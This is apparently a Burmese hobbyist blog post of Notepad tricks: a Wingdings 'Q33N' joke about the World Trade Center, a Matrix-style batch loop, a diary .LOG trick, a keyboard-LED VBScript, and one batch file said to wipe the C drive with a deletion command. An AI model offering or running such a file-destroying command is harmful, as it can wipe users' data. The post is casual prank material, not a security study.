Note pad ရဲ႕ cool trick ေလးေတြ
note pad ကို သာမန္ေရးမွတ္စရာအျဖစ္ပဲျမင္တတ္ၾကပါတယ္ .. တကယ္တတ္ကၽြမ္းတဲ့ဆရာေတြဆို web page ေတြ virus ေတြကိုဖန္တီးႏိုင္ၾကပါတယ္ ကၽြန္ေတာ္ကေတာ့ အဲဒါေတြ မတတ္ေတာ့ သိတာေလးပဲမွ်ေ၀ရတာေပါ့ဗ်ာ..ဟီး
1. World Trade Center Attack Trick
1. note pad ကို ဖြင့္ ပါ... Q33N လို႕ရိုက္ပါ
2. ေဖာင့္ဆိုဒ္ကို 72 သုိ႕ေျပာင္းပါ ( Format>font)
3. font type ကို Wingdings ကိုေျပာင္းေပးလိုက္ပါ
ဘာေတြ႕လဲဗ်ာ...
2.Matrix Effect Trick
ရုပ္ရွင္ေတြထဲမွာၾကည့္ဖူးၾကမွာပါ ဂဏန္းေတြေျပးေနတာေလ လွ်ပ္ျပက္သလို...အဲဒါမ်ိဳးေလးကို note pad နဲ႕ batch ဖိုင္ေလးေဆာက္ၾကည့္ေအာင္
ေအာက္ကကုဒ္ေတြကို note pad မွာ ကူးထည့္ပါ
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
ၿပီးရင္ file name ေနရာမွာ name.bat လို႕ေပးၿပီး သိမ္းပါ ၿပီးရင္ သိမ္းထားတဲ့ေနရာမွာ ဖြင့္ၾကည့္လိုက္ပါ...
3. Creating bat file That Format C Drive
ဒါကေတာ့ C drive ကို format ရိုက္ပလိုက္မယ့္ bat ဖိုင္ပါ..သြားဖြင့္မၾကည့္နဲ႕ေနာ္ ဟဲ
@Echo off
Del C:\ *.* |y
file name မွာ name.bat နဲ႕သိမ္းေပးရမွာပါ
4. Making Personal Diary Using Note pad
ဒါကေေတာ့သင့္ရဲ႕ေန႕စဥ္ ဒိုင္ယာရီေတြကို ေရးသားမွတ္ထားႏိုင္တဲ့ log book ကေလးလုပ္နည္းပါ
note pad မွာ .LOG လို႕စာလုံးအၾကီးနဲ႕ရိုက္ထည့္ပါ ..ၿပီးေတာ့ ဒိုင္ယာရီေရးသားႏိုပါတယ္.. သိမ္းၿပီး ျပန္ဖြင့္ၾကည့္တိုင္း သင္ေရးခဲ့တဲ့ ေနစြဲနဲ႕ အမွတ္တရျပန္လည္ေဖာ္ျပေပးမွာပါ..
5. Dancing Keyboard Led
လက္ေတာ့ပ္ေတြမွာရမယ္မထင္ပါဘူး ကီးဘုတ္မွာ သုံးဖို႕ပါ ကီးဘုတ္ရဲ႕ Numlock နဲ႕ Cap lock , Scroll lock မီးေလးေတြကို ဒစ္စကိုကခန္းေတြမွာလို႕ ဖလက္ထေအာင္လုပ္ၾကည္ပမွာပါ
ေအာက္ကကုဒ္ေတြကို note pad မွာကူးထည့္ပါ
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
ၿပီးရင္ File name မွာ name.vbs နဲ႕သိမ္းေပးပါ..ၿပီးရင္ဖြင့္ၾကည့္လိုက္ပါ
ခုလိုအားေပးတဲ့အတြက္ေက်းဇူးပါ..Facebook Page ေလးကိုေတာ့ LIKE ေပးသြားပါဗ်ာ..လိုအပ္တာေတြကိုလည္း C-box မွာ မွာၾကားခဲ့ႏိုင္ပါတယ္
0 comments:
Post a Comment